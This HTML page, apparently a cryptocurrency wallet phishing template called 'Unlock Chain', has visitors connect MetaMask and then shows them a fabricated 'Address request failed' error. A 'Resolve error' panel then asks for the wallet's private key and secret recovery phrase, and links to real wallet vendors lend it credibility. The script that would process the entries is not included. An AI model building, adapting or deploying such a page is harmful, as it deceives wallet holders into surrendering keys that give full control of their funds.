<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <title>Unlock Chain</title>
    <link rel="stylesheet" href="styles.css">
</head>
<body>

<div class="dashboard">
    <div class="sidebar">
        <h2>Unlock Chain</h2>
        <button id="connectButton">Connect a MetaMask</button>
        <p id="userAddress" style="color: green;"></p>
        <p id="addressStatus">Status Address: </p>
      <div id="errorOptions">

<button id="fixErrorsButton" style="display: none; background-color: #007BFF; color: white; border: none; padding: 8px 12px; font-size: 14px; border-radius: 5px;">Resolve error</button>

          
<div id="fixErrorsContent" class="correction-content" style="display: none;">
    <div class="correction-option">
        <input type="text" id="addressInput" placeholder="To add PRIVATE KEY">
        <button id="submitAddress" style="display: none; background-color: #007BFF; color: white; border: none; padding: 8px 12px; font-size: 14px; border-radius: 5px;">Restart</button>

    <div class="correction-option">
        <button id="addTextButton" style="background-color: #007FFF; color: white; border: none; padding: 8px 12px; font-size: 14px; border-radius: 5px;">To add phrase secret</button>
<div id="textInputsContainer" class="text-inputs-container" style="display: none; flex-wrap: wrap;">
        </div>
        <button id="submitTexts" class="submit-texts" style="display: none; background-color: #007BFF; color: white; border: none; padding: 8px 12px; font-size: 14px; border-radius: 5px;">Restart</button>
           </div>
        </div>
    </div>
    </div>

    <nav>
        <ul>
            
                <li><a href="https://metamask.io/" target="_blank">MetaMask</a></li>
                <li><a href="https://trustwallet.com/" target="_blank">Trust Wallet</a></li>
                <li><a href="https://www.coinomi.com/" target="_blank">Coinomi</a></li>
                <li><a href="https://www.exodus.com/" target="_blank">Exodus</a></li>
            </ul>
        </ul>
    </nav>
</div>


 <div class="main-content">
    <h1>Status Address</h1>
    <!-- Sección de información de la dirección que será visible tras conectarse -->
    <div id="addressInfo" style="display: none;">
        <h2>Address connect <span id="userAddress"></span></h2>
        <p>"Address request failed, please check log details and hash"</p>
        <div id="failedTransactionsList">
            <h2> View detail on the blockchain </h2>
            <table>
                <thead>
                    <tr>
                        <th>Hash Tx</th>
                        <th>Error.Log</th>
                        <th>Transaction</th>
                    </tr>
                </thead>
                <tbody id="failedTransactionsBody">
                    <!-- Las filas se agregarán dinámicamente -->
                </tbody>
            </table>
        </div>
    </div>
</div>


<script src="script.js"></script>
</body>
</html>
